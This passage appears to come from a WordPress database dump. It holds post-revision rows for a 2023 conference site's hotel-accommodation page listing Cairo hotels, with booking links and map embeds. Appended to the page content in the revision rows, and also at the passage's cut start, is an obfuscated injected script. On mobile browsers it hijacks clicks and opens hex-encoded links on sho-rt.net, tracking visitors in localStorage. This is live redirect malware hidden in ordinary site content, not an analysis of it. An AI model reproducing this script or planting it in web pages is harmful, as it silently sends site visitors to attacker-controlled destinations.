Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-25 16:48:24','2023-06-25 16:48:24','',3066,'https://gsw2023.com/?p=4832',0,'revision','',0),
(4833,4,'2023-06-25 18:51:38','2023-06-25 18:51:38','','IMG-20230623-WA0046','','inherit','open','closed','','img-20230623-wa0046','','','2023-06-25 18:51:38','2023-06-25 18:51:38','',2685,'https://gsw2023.com/wp-content/uploads/2023/06/IMG-20230623-WA0046.jpg',0,'attachment','image/jpeg',0),
(4834,4,'2023-06-25 18:52:22','2023-06-25 18:52:22','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<ul>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2689\" primary_title=\"Kempinski Nile Hotel Garden City Cairo\" primary_title_font_container=\"color:%230000ed\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Kempinski Nile Hotel Garden City Cairo\" el_width=\"50\" use_custom_fonts_primary_title=\"true\" primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][dt_slideshow][vc_single_image image=\"4791\" alignment=\"center\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-06-25 18:52:22','2023-06-25 18:52:22','',2685,'https://gsw2023.com/?p=4834',0,'revision','',0),
(4835,4,'2023-06-25 18:54:07','2023-06-25 18:54:07','<p>[vc_row][vc_column][vc_hoverbox image=\"2683\" primary_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"INTERCONTINENTAL CAIRO SEMIRAMIS\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fgb%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%23scmisc%3Dnav_hoteldetail_ic|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\n</li>\n</ul>\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5></h5>\n<h5>Deadline for the Special Rates is August 10, 2023</h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\n<p>[/vc_column_text][vc_hoverbox image=\"2688\" primary_title=\"Steigenberger Hotel El Tahrir\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Steigenberger Hotel El Tahrir\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" hover_btn_align=\"center\" use_custom_fonts_primary_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.steigenberger.com%2Fen%2Fhotels%2Fall-hotels%2Fegypt%2Fcairo%2Fsteigenberger-el-tahrir-cairo|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fsteigenberger-hotel-el-tahrir%2F\"]</p>\n<ul>\n<li><a href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"4788\" primary_title=\"Grand Nile Tower Hotel\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Grand Nile Tower Hotel\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fwww.grandniletower.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fgrand-nile-tower-hotel%2F|title:Grand%20Nile%20Tower%20Hotel\"]</p>\n<ul>\n<li>https://www.grandniletower.com/</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h5></h5>\n<p>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" hover_btn_color=\"primary\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" 